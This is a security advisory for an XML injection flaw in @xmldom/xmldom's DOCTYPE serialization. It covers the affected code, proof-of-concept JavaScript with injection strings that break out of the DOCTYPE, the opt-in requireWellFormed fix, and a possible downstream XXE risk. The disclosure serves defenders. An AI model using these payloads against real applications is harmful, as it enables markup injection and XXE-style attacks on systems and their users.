CVE-2026-41674
ADVISORY - GitHub
Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only programmatically: through
createDocumentType calls with attacker-controlled arguments, or through direct writes to a
DocumentType node's publicId, systemId, or internalSubset properties.
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
  validateQualifiedName(qualifiedName); // only qualifiedName is validated
  var node = new DocumentType(PDC);
  node.name = qualifiedName;
  node.nodeName = qualifiedName;
  node.publicId = publicId || ''; // stored verbatim
  node.systemId = systemId || ''; // stored verbatim
  node.internalSubset = internalSubset || ''; // stored verbatim
  node.childNodes = new NodeList();
  return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
  var pubid = node.publicId;
  var sysid = node.systemId;
  buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
  if (pubid) {
    buf.push(' ', g.PUBLIC, ' ', pubid);
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', g.SYSTEM, ' ', sysid);
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
  }
  buf.push('>');
  return;
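To make the concatenation easier to follow, the DOCTYPE branch above can be modeled as a small standalone function. This is a simplified sketch, not the library source: serializeDoctypeModel is a hypothetical name, and the three keyword constants are assumed values for g.DOCTYPE_DECL_START, g.PUBLIC, and g.SYSTEM.

```javascript
// Simplified stand-in for the serializer's DOCTYPE branch (NOT the library code).
// Assumed values for g.DOCTYPE_DECL_START, g.PUBLIC and g.SYSTEM:
const DOCTYPE_DECL_START = '<!DOCTYPE';
const PUBLIC = 'PUBLIC';
const SYSTEM = 'SYSTEM';

// Hypothetical helper: builds the DOCTYPE string the same way the quoted
// branch does, by pushing every field into a buffer without escaping.
function serializeDoctypeModel(node) {
  const buf = [DOCTYPE_DECL_START, ' ', node.name];
  const pubid = node.publicId;
  const sysid = node.systemId;
  if (pubid) {
    buf.push(' ', PUBLIC, ' ', pubid);
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', SYSTEM, ' ', sysid);
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']');
  }
  buf.push('>');
  return buf.join('');
}

// Well-formed input: the caller supplies the quotes, the model adds none.
const benign = serializeDoctypeModel({
  name: 'html',
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
  internalSubset: '',
});

// Hostile input: "]>" in internalSubset ends the declaration early.
const hostile = serializeDoctypeModel({
  name: 'root',
  publicId: '',
  systemId: '',
  internalSubset: ']><injected/><![CDATA[',
});

console.log(benign);
console.log(hostile);
```

Because nothing in this path inspects the field contents, any delimiter inside a field is indistinguishable from one the serializer wrote itself.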
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '',
  ']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
//                   ^^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '"injected PUBLIC_ID" SYSTEM "evil"',
  '',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken: SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '"sysid"><injected attr="pwn"/>',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true } is explicitly passed. Applications that pass untrusted data to createDocumentType() or write untrusted values directly to a DocumentType node's publicId, systemId, or internalSubset properties should audit all serializeToString() call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
publicId: throws if non-empty and does not match the XML PubidLiteral production (XML 1.0 [12])
systemId: throws if non-empty and does not match the XML SystemLiteral production (XML 1.0 [11])
internalSubset: throws if it contains ]> (which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
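The three checks can be approximated in application code, for example to reject untrusted values before they ever reach a DocumentType node. The sketch below is an assumption-laden illustration, not the library's implementation: findDoctypeFieldProblems and both regex constants are hypothetical names, the patterns are transcribed from XML 1.0 productions [11] and [12] and match the whole literal including its delimiting quotes, and problems are returned as a list rather than thrown as InvalidStateError.

```javascript
// Hypothetical application-side approximation of the three checks.
// XML 1.0 [12] PubidLiteral: quoted run of PubidChar (no "'" inside single quotes).
const PUBID_LITERAL =
  /^(?:"[\x20\r\na-zA-Z0-9\-'()+,.\/:=?;!*#@$_%]*"|'[\x20\r\na-zA-Z0-9\-()+,.\/:=?;!*#@$_%]*')$/;
// XML 1.0 [11] SystemLiteral: anything between matching quotes except that quote.
const SYSTEM_LITERAL = /^(?:"[^"]*"|'[^']*')$/;

// Returns a list of human-readable problems; an empty list means all
// three fields passed. Empty strings are treated as "field not set".
function findDoctypeFieldProblems({ publicId = '', systemId = '', internalSubset = '' }) {
  const problems = [];
  if (publicId && !PUBID_LITERAL.test(publicId)) {
    problems.push('publicId is not a valid PubidLiteral');
  }
  if (systemId && !SYSTEM_LITERAL.test(systemId)) {
    problems.push('systemId is not a valid SystemLiteral');
  }
  if (internalSubset.includes(']>')) {
    problems.push('internalSubset contains "]>"');
  }
  return problems;
}

// Well-formed identifiers pass.
const okProblems = findDoctypeFieldProblems({
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
});

// The three PoC payloads from this advisory are all flagged.
const pocProblems = findDoctypeFieldProblems({
  publicId: '"injected PUBLIC_ID" SYSTEM "evil"',
  systemId: '"sysid"><injected attr="pwn"/>',
  internalSubset: ']><injected/><![CDATA[',
});

console.log(okProblems);
console.log(pocProblems);
```

A pre-check like this complements the serializer option rather than replacing it, since it only sees values that pass through the code path where it is called.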
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);
// Default (unchanged): verbatim, injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// Opt-in guard: throws InvalidStateError
try {
  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// throws InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. Adding creation-time validation would be a breaking change, so it is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
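Since the guard only applies when the option is passed, one way to avoid missing a call site is to route serialization through a single helper. The following is a minimal sketch under stated assumptions: serializeStrict is a hypothetical name, the serializer is passed in as a parameter, and the stub object stands in for XMLSerializer so the example runs without the package installed. It only helps with a release that contains the fix; versions without it will not interpret the second argument as this option.

```javascript
// Hypothetical wrapper: every serialization goes through the opt-in guard.
// `serializer` is expected to be an XMLSerializer from a fixed release.
function serializeStrict(serializer, node) {
  return serializer.serializeToString(node, { requireWellFormed: true });
}

// Stand-in for XMLSerializer (assumption, for demonstration only): it
// records the options it receives instead of serializing anything.
const seenOptions = [];
const stubSerializer = {
  serializeToString(node, options) {
    seenOptions.push(options);
    return '<root/>';
  },
};

const result = serializeStrict(stubSerializer, { nodeName: 'root' });
console.log(result, seenOptions[0]);
```

In real use the stub would be replaced by new XMLSerializer(), and the caller would need to handle the InvalidStateError that a rejected DocumentType field produces.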
Common Weakness Enumeration (CWE)
XML Injection (aka Blind XPath Injection)
NIST: CVSS score 8.7 (high)
GitHub: CVSS score 8.7 (high)
Debian: -
Ubuntu: CVSS score N/A (medium)
Chainguard: CGA-93f6-hh34-rp9x
minimos: MINI-gfpj-ghf9-x3vj